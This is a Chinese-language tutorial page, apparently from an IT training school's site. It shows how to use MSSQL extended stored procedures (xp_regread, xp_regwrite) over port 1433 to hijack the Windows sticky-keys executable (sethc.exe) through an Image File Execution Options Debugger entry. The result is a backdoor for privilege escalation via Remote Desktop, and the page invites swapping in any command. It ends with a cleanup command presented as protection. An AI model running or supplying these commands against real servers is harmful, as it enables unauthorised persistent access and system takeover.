微信客服
微信公众号
北大青鸟数据库技术:1433映像劫持后门提权。
1.服务器开启了终端端口(终端端口未必是3389,可以自行查询)
2.服务器的粘滞键功能无损,只要可以正常弹出即可
3.服务器未禁止注册表编辑(即写入功能)
sql命令读取服务器终端端口:
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-
Tcp','PortNumber'
1.sql命令查询注册表粘滞键是否被劫持
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'
2.sql命令劫持注册表粘滞键功能,替换成任务管理器(当然你也可以替换成你想要的其他命令)
xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',
'Debugger','REG_SZ','C:\WINDOWS\system32\taskmgr.exe'
3.sql命令删除注册表粘滞键的劫持功能保护你的服务器不再被他人利用
xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'
了解更多北大青鸟数据库技术请继续关注云顶国际官网。
- 什么是SQL数据库?SQL数据库是什么?
- Oracle逗号分隔列转行匹配多条记录
- 北大青鸟学大数据好吗?就业前景在哪?
- 数据库原理及应用教程之数据库架构抉择
- Mysql数据库备份和还原的常用命令
- 服务器端包含的入门相关技术
- 计算机IT技术:切分数据库与集群
- 数据库技术之多表创建的视图insert解决方法
- 参数化查询解决SQL注入漏洞问题
- 7个使用比较广泛的HTML5视频音频播放器
看过该数据库技术教程的还看过
本文标题:北大青鸟数据库技术 1433映像劫持后门提权,责任编辑:027hpedu,来源:北大青鸟武汉宏鹏鲁广校,于2013年04月23日15时14分发布于云顶国际登录官网。云顶国际宏鹏鲁广校区,是北大青鸟武汉电脑学校,专业IT计算机培训,拥有软件/网络/安卓/Web前端/Java课程.北大青鸟地址:光谷广场鲁巷数码港.电话:027-87807717
